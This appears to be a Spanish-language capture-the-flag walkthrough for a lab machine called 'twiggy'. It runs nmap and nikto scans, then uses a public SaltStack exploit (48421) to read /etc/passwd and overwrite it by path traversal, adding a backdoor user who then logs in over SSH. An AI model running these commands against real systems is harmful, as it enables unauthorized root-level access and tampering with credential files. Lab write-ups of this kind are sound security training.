nmap -A -p- -oA twiggy 192.168.68.62 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA twiggy 192.168.68.62

nmap -sU -O -p- -oA twiggy-udp 192.168.68.62

nikto -h 192.168.68.62:80

Pasted image 20211108074323.png

Pasted image 20211108074526.png

whatweb http://192.168.68.62/

Pasted image 20211108075025.png

Vamos a http://192.168.68.62:8000 y solo vemos json

Pasted image 20211108074756.png

Vamos a http://192.168.68.62/ y trate de logearme con admin:admin y no tuve exito.

Pasted image 20211108074813.png

searchsploit SaltStack

searchsploit -m 48421

Pasted image 20211108075127.png

python3 48421.py --master 192.168.68.62 --read /etc/passwd

Creamos un archivo llamado passwd y le agregamos un usuario con contrasena al final + lo que obtuvimos con el comando anterior.

Pasted image 20211108081049.png

python3 48421.py --master 192.168.68.62 --upload-src passwd --upload-dest ../../../../../etc/passwd

Pasted image 20211108081136.png

Con el usuario y contrasena en el paso al crear el archivo passwd nos tratamos de logear por ssh

ssh cu3rv0x@192.168.68.62

Pasted image 20211108081402.png

boxes

copyright©2022 Cu3rv0x all rights reserved